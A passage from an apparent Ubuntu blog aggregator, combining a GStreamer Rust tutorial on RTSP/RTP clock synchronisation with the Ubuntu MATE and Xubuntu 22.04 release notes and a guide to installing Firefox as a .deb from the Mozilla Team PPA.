Overall this creates the following RTSP stream producer bin, which will be used also in all the following steps:

Receiver

The receiver is a simple playbin pipeline that plays an RTSP URI given via command-line parameters and runs until the stream is finished or an error has happened.

It can be run with the following once the sender is started

$ cargo run -p rtp-rapid-sync-example-send -- "rtsp://192.168.1.101:8554/test"

Please don’t forget to replace the IP with the IP of the machine that is actually running the server.

All the code should be familiar to anyone who ever wrote a GStreamer application in Rust, except for one part that might need a bit more explanation

pipeline.connect_closure(
    "source-setup",
    false,
    glib::closure!(|_playbin: &gst::Pipeline, source: &gst::Element| {
        source.set_property("latency", 40u32);
    }),
);

playbin is going to create an rtspsrc, and at that point it will emit the source-setup signal so that the application can do any additional configuration of the source element. Here we’re connecting a signal handler to that signal to do exactly that.

By default rtspsrc introduces a latency of 2 seconds of latency, which is a lot more than what is usually needed. For live, non-VOD RTSP streams this value should be around the network jitter and here we’re configuring that to 40 milliseconds.

Retrieval of absolute sender clock times

Now as the first step we’re going to retrieve the absolute sender clock times for each video frame on the receiver. They will be rendered by the receiver at the bottom of each video frame and will also be printed to stdout. The changes between the previous version of the code and this version can be seen here and the final code here in the sender-clock-time-retrieval branch.

When running the sender and receiver as before, the video from the receiver should look similar to the following

The upper time that is rendered on the video frames is rendered by the sender, the bottom time is rendered by the receiver and both should always be the same unless something is broken here. Both times are the pipeline clock time when the sender created/captured the video frame.

In this configuration the absolute clock times of the sender are provided to the receiver via the NTP / RTP timestamp mapping provided by the RTCP Sender Reports. That’s also the reason why it takes about 5s for the receiver to know the sender’s clock time as RTCP packets are not scheduled very often and only after about 5s by default. The RTCP interval can be configured on rtpbin together with many other things.

Sender

On the sender-side the configuration changes are rather small and not even absolutely necessary.

rtpbin.set_property_from_str("ntp-time-source", "clock-time");

By default the RTP NTP time used in the RTCP packets is based on the local machine’s walltime clock converted to the NTP epoch. While this works fine, this is not the clock that is used for synchronizing the media and as such there will be drift between the RTP timestamps of the media and the NTP time from the RTCP packets, which will be reset every time the receiver receives a new RTCP Sender Report from the sender.

Instead, we configure rtpbin here to use the pipeline clock as the source for the NTP timestamps used in the RTCP Sender Reports. This doesn’t give us (by default at least, see later) an actual NTP timestamp but it doesn’t have the drift problem mentioned before. Without further configuration, in this pipeline the used clock is the monotonic system clock.

rtpbin.set_property("rtcp-sync-send-time", false);

rtpbin normally uses the time when a packet is sent out for the NTP / RTP timestamp mapping in the RTCP Sender Reports. This is changed with this property to instead use the time when the video frame / audio sample was captured, i.e. it does not include all the latency introduced by encoding and other processing in the sender pipeline.

This doesn’t make any big difference in this scenario but usually one would be interested in the capture clock times and not the send clock times.

Receiver

On the receiver-side there are a few more changes. First of all we have to opt-in to rtpjitterbuffer putting a reference timestamp metadata on every received packet with the sender’s absolute clock time.

pipeline.connect_closure(
    "source-setup",
    false,
    glib::closure!(|_playbin: &gst::Pipeline, source: &gst::Element| {
        source.set_property("latency", 40u32);
        source.set_property("add-reference-timestamp-meta", true);
    }),
);

rtpjitterbuffer will start putting the metadata on packets once it knows the NTP / RTP timestamp mapping, i.e. after the first RTCP Sender Report is received in this case. Between the Sender Reports it is going to interpolate the clock times. The normal timestamps (PTS) on each packet are not affected by this and are still based on whatever clock is used locally by the receiver for synchronization.

To actually make use of the reference timestamp metadata we add a timeoverlay element as video-filter on the receiver:

let timeoverlay =
    gst::ElementFactory::make("timeoverlay", None).context("Creating timeoverlay")?;

timeoverlay.set_property_from_str("time-mode", "reference-timestamp");
timeoverlay.set_property_from_str("valignment", "bottom");

pipeline.set_property("video-filter", &timeoverlay);

This will then render the sender’s absolute clock times at the bottom of each video frame, as seen in the screenshot above.

And last we also add a pad probe on the sink pad of the timeoverlay element to retrieve the reference timestamp metadata of each video frame and then printing the sender’s clock time to stdout:

let sinkpad = timeoverlay
    .static_pad("video_sink")
    .expect("Failed to get timeoverlay sinkpad");
sinkpad
    .add_probe(gst::PadProbeType::BUFFER, |_pad, info| {
        if let Some(gst::PadProbeData::Buffer(ref buffer)) = info.data {
            if let Some(meta) = buffer.meta::<gst::ReferenceTimestampMeta>() {
                println!("Have sender clock time {}", meta.timestamp());
            } else {
                println!("Have no sender clock time");
            }
        }

        gst::PadProbeReturn::Ok
    })
    .expect("Failed to add pad probe");

Rapid synchronization via RTP header extensions

The main problem with the previous code is that the sender’s clock times are only known once the first RTCP Sender Report is received by the receiver. There are many ways to configure rtpbin to make this happen faster (e.g. by reducing the RTCP interval or by switching to the AVPF RTP profile) but in any case the information would be transmitted outside the actual media data flow and it can’t be guaranteed that it is actually known on the receiver from the very first received packet onwards. This is of course not a problem in every use-case, but for the cases where it is there is a solution for this problem.

RFC 6051 defines an RTP header extension that allows to transmit the NTP timestamp that corresponds an RTP packet directly together with this very packet. And that’s what the next changes to the code are making use of.

The changes between the previous version of the code and this version can be seen here and the final code here in the rapid-synchronization branch.

Sender

To add the header extension on the sender-side it is only necessary to add an instance of the corresponding header extension implementation to the payloaders.

let hdr_ext = gst_rtp::RTPHeaderExtension::create_from_uri(
    "urn:ietf:params:rtp-hdrext:ntp-64",
    )
    .context("Creating NTP 64-bit RTP header extension")?;
hdr_ext.set_id(1);
video_pay.emit_by_name::<()>("add-extension", &[&hdr_ext]);

This first instantiates the header extension based on the uniquely defined URI for it, then sets its ID to 1 (see RFC 5285) and then adds it to the video payloader. The same is then done for the audio payloader.

By default this will add the header extension to every RTP packet that has a different RTP timestamp than the previous one. In other words: on the first packet that corresponds to an audio or video frame. Via properties on the header extension this can be configured but generally the default should be sufficient.

Receiver

On the receiver-side no changes would actually be necessary. The use of the header extension is signaled via the SDP (see RFC 5285) and it will be automatically made use of inside rtpbin as another source of NTP / RTP timestamp mappings in addition to the RTCP Sender Reports.

However, we configure one additional property on rtpbin

source.connect_closure(
    "new-manager",
    false,
    glib::closure!(|_rtspsrc: &gst::Element, rtpbin: &gst::Element| {
        rtpbin.set_property("min-ts-offset", gst::ClockTime::from_mseconds(1));
    }),
);

Inter-stream audio/video synchronization

The reason for configuring the min-ts-offset property on the rtpbin is that the NTP / RTP timestamp mapping is not only used for providing the reference timestamp metadata but it is also used for inter-stream synchronization by default. That is, for getting correct audio / video synchronization.

With RTP alone there is no mechanism to synchronize multiple streams against each other as the packet’s RTP timestamps of different streams have no correlation to each other. This is not too much of a problem as usually the packets for audio and video are received approximately at the same time but there’s still some inaccuracy in there.

One approach to fix this is to use the NTP / RTP timestamp mapping for each stream, either from the RTCP Sender Reports or from the RTP header extension, and that’s what is made use of here. And because the mapping is provided very often via the RTP header extension but the RTP timestamps are only accurate up to clock rate (1/90000s for video and 1/48000s) for audio in this case, we configure a threshold of 1ms for adjusting the inter-stream synchronization. Without this it would be adjusted almost continuously by a very small amount back and forth.

Other approaches for inter-stream synchronization are provided by RTSP itself before streaming starts (via the RTP-Info header), but due to a bug this is currently not made use of by GStreamer.

Yet another approach would be via the clock information provided by RFC 7273, about which I already wrote previously and which is also supported by GStreamer. This also allows inter-device, network synchronization and used for that purpose as part of e.g. AES67, Ravenna, SMPTE 2022 / 2110 and many other protocols.

Inter-device network synchronization

Now for the last part, we’re going to add actual inter-device synchronization to this example. The changes between the previous version of the code and this version can be seen here and the final code here in the network-sync branch. This does not use the clock information provided via RFC 7273 (which would be another option) but uses the same NTP / RTP timestamp mapping that was discussed above.

When starting the receiver multiple times on different (or the same) machines, each of them should play back the media synchronized to each other and exactly 2 seconds after the corresponding audio / video frames are produced on the sender.

For this, both sender and all receivers are using an NTP clock (pool.ntp.org in this case) instead of the local monotonic system clock for media synchronization (i.e. as the pipeline clock). Instead of an NTP clock it would also be possible to any other mechanism for network clock synchronization, e.g. PTP or the GStreamer netclock.

println!("Syncing to NTP clock");
clock
    .wait_for_sync(gst::ClockTime::from_seconds(5))
    .context("Syncing NTP clock")?;
println!("Synced to NTP clock");

This code instantiates a GStreamer NTP clock and then synchronously waits up to 5 seconds for it to synchronize. If that fails then the application simply exits with an error.

Sender

On the sender side all that is needed is to configure the RTSP media factory, and as such the pipeline used inside it, to use the NTP clock

factory.set_clock(Some(&clock));

This causes all media inside the sender’s pipeline to be synchronized according to this NTP clock and to also use it for the NTP timestamps in the RTCP Sender Reports and the RTP header extension.

Receiver

On the receiver side the same has to happen

pipeline.use_clock(Some(&clock));

In addition a couple more settings have to be configured on the receiver though. First of all we configure a static latency of 2 seconds on the receiver’s pipeline.

pipeline.set_latency(gst::ClockTime::from_seconds(2));

This is necessary as GStreamer can’t know the latency of every receiver (e.g. different decoders might be used), and also because the sender latency can’t be automatically known. Each audio / video frame will be timestamped on the receiver with the NTP timestamp when it was captured / created, but since then all the latency of the sender, the network and the receiver pipeline has passed and for this some compensation must happen.

Which value to use here depends a lot on the overall setup, but 2 seconds is a (very) safe guess in this case. The value only has to be larger than the sum of sender, network and receiver latency and in the end has the effect that the receiver is showing the media exactly that much later than the sender has produced it.

And last we also have to tell rtpbin that

  1. sender and receiver clock are synchronized to each other, i.e. in this case both are using exactly the same NTP clock, and that no translation to the pipeline’s clock is necessary, and
  2. that the outgoing timestamps on the receiver should be exactly the sender timestamps and that this conversion should happen based on the NTP / RTP timestamp mapping

source.set_property_from_str("buffer-mode", "synced");
source.set_property("ntp-sync", true);

And that’s it.

A careful reader will also have noticed that all of the above would also work without the RTP header extension, but then the receivers would only be synchronized once the first RTCP Sender Report is received. That’s what the test-netclock.c / test-netclock-client.c example from the GStreamer RTSP server is doing.

As usual with RTP, the above is by far not the only way of doing this and GStreamer also supports various other synchronization mechanisms. Which one is the correct one for a specific use-case depends on a lot of factors.

on May 02, 2022 01:00 PM

April 26, 2022

Ubuntu MATE 22.04 LTS is the culmination of 2 years of continual improvement 😅 to Ubuntu and MATE Desktop. As is tradition, the LTS development cycle has a keen focus on eliminating paper 🧻 cuts 🔪 but we’ve jammed in some new features and a fresh coat of paint too 🖌 The following is a summary of what’s new since Ubuntu MATE 21.10 and some reminders of how we got here from 20.04. Read on to learn more 🧑‍🎓

Thank you! 🙇

I’d like to extend my sincere thanks to everyone who has played an active role in improving Ubuntu MATE for this LTS release 👏 From reporting bugs, submitting translations, providing patches, contributing to our crowd funding, developing new features, creating artwork, offering community support, actively testing and providing QA feedback to writing documentation or creating this fabulous website. Thank you! Thank you all for getting out there and making a difference! 💚

Ubuntu MATE 22.04 LTS Ubuntu MATE 22.04 LTS (Jammy Jellyfish) - Mutiny layout with Yark-MATE-dark

What’s changed?

Here are the highlights of what’s changed recently.

MATE Desktop 1.26.1 🧉

Ubuntu MATE 22.04 features MATE Desktop 1.26.1. MATE Desktop 1.26.0 was introduced in 21.10 and benefits from significant effort 😅 in fixing bugs 🐛 in MATE Desktop, optimising performance ⚡ and plugging memory leaks. MATE Desktop 1.26.1 addresses the bugs we discovered following the initial 1.26.0 release. Our community also fixed some bugs in Plank and Brisk Menu 👍 and also fixed the screen reader during installs for visually impaired users 🥰 In all over 500 bugs have been addressed in this release 🩹

Yaru 🎨

Ubuntu MATE 21.04 was the first release to ship with a MATE variant of the Yaru theme. A year later and we’ve been working hard with members of the Yaru and Ubuntu Desktop teams to bring full MATE compatibility to upstream Yaru, including all the accent colour varieties. All reported bugs 🐞 in the Yaru implementation for MATE have also been fixed 🛠

Yaru Themes Yaru Themes in Ubuntu MATE 22.04 LTS

Ubuntu MATE 22.04 LTS ships with all the Yaru themes, including our own “chelsea cucumber” version 🥒 The legacy Ambiant/Radiant themes are no longer installed by default and neither are the stock MATE Desktop themes. We’ve added an automatic settings migration to transition users who upgrade to an appropriate Yaru MATE theme.

Cherries on top 🍒

In collaboration with Paul Kepinski 🇫🇷 (Yaru team) and Marco Trevisan 🇮🇹 (Ubuntu Desktop team) we’ve added dark/light panels and panel icons to Yaru for MATE Desktop and Unity. I’ve added a collection of new dark/light panel icons to Yaru for popular apps with indicators such as Steam, Dropbox, uLauncher, RedShift, Transmission, Variety, etc.

Light Panel Dark Panel Light and Dark panels

I’ve added patches 🩹 to the Appearance Control Center that applies theme changes to Plank (the dock), Pluma (text editor) and correctly toggles the colour scheme preference for GNOME 42 apps. When you choose a dark theme, everything will go dark in unison 🥷 and vice versa.

So, Ubuntu MATE 22.04 LTS is now using everything Yaru/Suru has to offer. 🎉

AI Generated wallpapers

My friend Simon Butcher 🇬🇧 is Head of Research Platforms at Queen Mary University of London managing the Apocrita HPC cluster service. He’s been creating AI 🤖 generated art using bleeding edge CLIP guided diffusion models 🖌 The results are pretty incredible and we’ve included the 3 top voted “Jammy Jellyfish” in our wallpaper selection as their vivid and vibrant styles compliment the Yaru accent colour theme options very nicely indeed 😎

If you want the complete set, here’s a tarball of all 8 wallpapers at 3840x2160:

Ubuntu MATE stuff 🧉

Ubuntu MATE has a few distinctive apps and integrations of it’s own, here’s a run down of what’s new and shiny ✨

MATE Tweak

Switching layouts with MATE Tweak is its most celebrated feature. We’ve improved the reliability of desktop layout switching and restoring custom layouts is now 100% accurate 💯

Ubuntu MATE Desktop Layouts Having your desktop your way in Ubuntu MATE

We’ve removed mate-netbook from the default installation of Ubuntu MATE and as a result the Netbook layout is no longer available. We did this because mate-maximus, a component of mate-netbook, is the cause of some compatibility issues with client side decorated (CSD) windows. There are still several panel layouts that offer efficient resolution use 📐 for those who need it.

MATE Tweak has refreshed its supported for 3rd party compositors. Support for Compton has been dropped, as it is no longer actively maintained and comprehensive support for picom has been added. picom has three compositor options: Xrender, GLX and Hybrid. All three are can be selected via MATE Tweak as the performance and compatibility of each varies depending on your hardware. Some people choose to use picom because they get better gaming performance or screen tearing is reduced. Some just like subtle animation effects picom adds 💖

MATE HUD

Recent versions of rofi, the tool used by MATE HUD to visualise menu searches, has a new theme system. MATE HUD has been updated to support this new theme engine and comes with two MATE specific themes (mate-hud and mate-hud-rounded) that automatically adapt to match the currently selected GTK theme.

You can add your own rofi themes to ~/.local/share/rofi/themes. Should you want to, you can use any rofi theme in MATE HUD. Use Alt + F2 to run rofi-theme-selector to try out the different themes, and if there is one you prefer you can set it as default by using running the following in a terminal:

gsettings set org.mate.hud rofi-theme <theme name>

MATE HUD MATE HUD uses the new rofi theme engine

Windows & Shadows

I’ve updated the Metacity/Marco (the MATE Window Manager) themes in Yaru to make sure they match GNOME/CSD/Handy windows for a consistent look and feel across all window types 🪟 and 3rd party compositors like picom. I even patched how Marco and picom render shadows so windows they look cohesive regardless of toolkit or compositor being used.

Ubuntu MATE Welcome & Boutique

The Software Boutqiue has been restocked with software for 22.04 and Firefox 🔥🦊 ESR (.deb) has been added to the Browser Ballot in Ubuntu MATE Welcome.

Ubuntu MATE Welcome Browser Ballot Comprehensive browser options just a click away

41% less fat 🍩

Ubuntu MATE, like it’s lead developer, was starting to get a bit large around the mid section 😊 During the development of 22.04, the image 📀 got to 4.1GB 😮

So, we put Ubuntu MATE on a strict diet 🥗 We’ve removed the proprietary NVIDIA drivers from the local apt pool on the install media and thanks to migrating fully to Yaru (which now features excellent de-duplication of icons) and also removing our legacy themes/icons. And now the Yaru-MATE themes/icons are completely in upstream Yaru, we were able to remove 3 snaps from the default install and the image is now a much more reasonable 2.7GB; 41% smaller. 🗜

This is important to us, because the majority of our users are in countries where Internet bandwidth is not always plentiful. Those of you with NVIDIA GPUs, don’t worry. If you tick the 3rd party software and drivers during the install the appropriate driver for your GPU will be downloaded and installed 👍

Install 3rd party drivers NVIDIA GPU owners should tick Install 3rd party software and drivers during install

While investigating 🕵 a bug in Xorg Server that caused Marco (the MATE window manager) to crash we discovered that Marco has lower frame time latency ⏱ when using Xrender with the NVIDIA proprietary drivers. We’ve published a PPA where NVIDIA GPU users can install a version of Marco that uses Xpresent for optimal performance

sudo apt-add-repository ppa:ubuntu-mate-dev/marco
sudo apt upgrade

Should you want to revert this change you install ppa-purge and run the following from a terminal: sudo ppa-purge -o ubuntu-mate-dev -p marco.

But wait! There’s more! 😲

These reductions in size are after we added three new applications to the default install on Ubuntu MATE: GNOME Clocks, Maps and Weather My family and I 👨‍👩‍👧 have found these applications particularly useful and use them regularly on our laptops without having to reach for a phone or tablet.

GNOME Clocks, Maps & Weather New additions to the default desktop application in Ubuntu MATE 22.04 LTS

For those of you who like a minimal base platform, then the minimal install option is still available which delivers just the essential Ubuntu MATE Desktop and Firefox browser. You can then build up from there 👷

Packages, packages, packages 📦

It doesn’t matter how you like to consume your Linux 🐧 packages, Ubuntu MATE has got you covered with PPA, Snap, AppImage and FlatPak support baked in by default. You’ll find flatpak, snapd and xdg-desktop-portal-gtk to support Snap and FlatPak and the (ageing) libfuse2 to support AppImage are all pre-installed.

Although flatpak is installed, FlatHub is not enabled by default. To enable FlatHub run the following in a terminal:

flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo

We’ve also included snapd-desktop-integration which provides a bridge between the user’s session and snapd to integrate theme preferences 🎨 with snapped apps and can also automatically install snapped themes 👔 All the Yaru themes shipped in Ubuntu MATE are fully snap aware.

Ayatana Indicators

Ubuntu MATE 20.10 transitioned to Ayatana Indicators 🚥 As a quick refresher, Ayatana Indicators are a fork of Ubuntu Indicators that aim to be cross-distro compatible and re-usable for any desktop environment 👌

Ubuntu MATE 22.04 LTS comes with Ayatana Indicators 22.2.0 and sees the return of Messages Indicator 📬 to the default install. Ayatana Indicators now provide improved backwards compatibility to Ubuntu Indicators and no longer requires the installation of two sets of libraries, saving RAM, CPU cycles and improving battery endurance 🔋

Ayatana Indicator Settings Ayatana Indicators Settings

To compliment the BlueZ 5.64 protocol stack in Ubuntu, Ubuntu MATE ships Blueman 2.2.4 which offers comprehensive management of Bluetooth devices and much improved pairing compatibility 💙🦷

I also patched mate-power-manager, ayatana-indicator-power and Yaru to add support for battery powered gaming input devices, such as controllers 🎮 and joysticks 🕹

Active Directory

And in case you missed it, the Ubuntu Desktop team added the option to enroll your computer into an Active Directory domain 🔑 during install. Ubuntu MATE has supported the same capability since it was first made available in the 20.10 release.

Raspberry Pi image 🥧

  • Should be available very shortly after the release of 22.04.

Major Applications

Accompanying MATE Desktop 1.26.1 and Linux 5.15 are Firefox 99.0, Celluloid 0.20, Evolution 3.44 & LibreOffice 7.3.2.1

See the Ubuntu 22.04 Release Notes for details of all the changes and improvements that Ubuntu MATE benefits from.

Download Ubuntu MATE 22.04 LTS

This new release will be first available for PC/Mac users.

Download

Upgrading from Ubuntu MATE 20.04 LTS and 21.10

You can upgrade to Ubuntu MATE 22.04 LTS from Ubuntu MATE either 20.04 LTS or 21.10. Ensure that you have all updates installed for your current version of Ubuntu MATE before you upgrade.

  • Open the “Software & Updates” from the Control Center.
  • Select the 3rd Tab called “Updates”.
  • Set the “Notify me of a new Ubuntu version” drop down menu to “For long-term support versions” if you are using 20.04 LTS; set it to “For any new version” if you are using 21.10.
  • Press Alt+F2 and type in update-manager -c -d into the command box.
  • Update Manager should open up and tell you: New distribution release ‘XX.XX’ is available.
    • If not, you can use /usr/lib/ubuntu-release-upgrader/check-new-release-gtk
  • Click “Upgrade” and follow the on-screen instructions.

There are no offline upgrade options for Ubuntu MATE. Please ensure you have network connectivity to one of the official mirrors or to a locally accessible mirror and follow the instructions above.

Known Issues

Here are the known issues.

Component Problem Workarounds Upstream Links
Ubuntu Ubiquity slide shows are missing for OEM installs of Ubuntu MATE

Feedback

Is there anything you can help with or want to be involved in? Maybe you just want to discuss your experiences or ask the maintainers some questions. Please come and talk to us.

on April 26, 2022 04:47 PM

April 23, 2022

It is now widely known that Ubuntu 22.04 LTS (Jammy Jellyfish) ships Firefox as a snap, but some people (like me) may prefer installing it from .deb packages to retain control over upgrades or to keep extensions working.

Luckily there is still a PPA serving firefox (and thunderbird) debs at https://launchpad.net/~mozillateam/+archive/ubuntu/ppa maintained by the Mozilla Team. (Thank you!)

You can block the Ubuntu archive’s version that just pulls in the snap by pinning it:

$ cat /etc/apt/preferences.d/firefox-no-snap 
Package: firefox*
Pin: release o=Ubuntu*
Pin-Priority: -1

Now you can remove the transitional package and the Firefox snap itself:

sudo apt purge firefox
sudo snap remove firefox
sudo add-apt-repository ppa:mozillateam/ppa
sudo apt update
sudo apt install firefox

Since the package comes from a PPA unattended-upgrades will not upgrade it automatically, unless you enable this origin:

echo 'Unattended-Upgrade::Allowed-Origins:: "LP-PPA-mozillateam:${distro_codename}";' | sudo tee /etc/apt/apt.conf.d/51unattended-upgrades-firefox

Happy browsing!

Update: I have found a few other, similar guides at https://fostips.com/ubuntu-21-10-two-firefox-remove-snap and https://ubuntuhandbook.org/index.php/2022/04/install-firefox-deb-ubuntu-22-04 and I’ve updated the pinning configuration based on them.

on April 23, 2022 02:38 PM

April 21, 2022

The Xubuntu team is happy to announce the immediate release of Xubuntu 22.04.

Xubuntu 22.04, codenamed Jammy Jellyfish, is a long-term support (LTS) release and will be supported for 3 years, until 2025.

The Xubuntu and Xfce development teams have made great strides in usability, expanded features, and additional applications in the last two years. Users coming from 20.04 will be delighted with improvements found in Xfce 4.16 and our expanded application set. 21.10 users will appreciate the added stability that comes from the numerous maintenance releases that landed this cycle.

The final release images are available as torrents and direct downloads from xubuntu.org/download/.

As the main server might be busy in the first few days after the release, we recommend using the torrents if possible.

Xubuntu Core, our minimal ISO edition, is available to download from unit193.net/xubuntu/core/ [torrent]. Find out more about Xubuntu Core here.

We’d like to thank everybody who contributed to this release of Xubuntu!

Highlights and Known Issues

Highlights

  • Mousepad 0.5.8, our text editor, broadens its feature set with the addition of session backup and restore, plugin support, and a new gspell plugin.
  • Ristretto 0.12.2, the versatile image viewer, improves thumbnail support and features numerous performance improvements.
  • Whisker Menu Plugin 2.7.1 expands customization options with several new preferences and CSS classes for theme developers.
  • Firefox is now included as a Snap package.
  • Refreshed user documentation, available on the ISO and online.
  • Six new wallpapers from the 22.04 Community Wallpaper Contest.

Known Issues

  • The shutdown prompt may not be displayed at the end of the installation. Instead you might just see a Xubuntu logo, a black screen with an underscore in the upper left hand corner, or just a black screen. Press Enter and the system will reboot into the installed environment. (LP: #1944519)
  • The Firefox Snap is not currently able to open the locally-installed Xubuntu Docs. (LP: #1967109)

For more obscure known issues, information on affecting bugs, bug fixes, and a list of new package versions, please refer to the Xubuntu Release Notes.

The main Ubuntu Release Notes cover many of the other packages we carry and more generic issues.

Support

For support with the release, navigate to Help & Support for a complete list of methods to get help.

on April 21, 2022 10:44 PM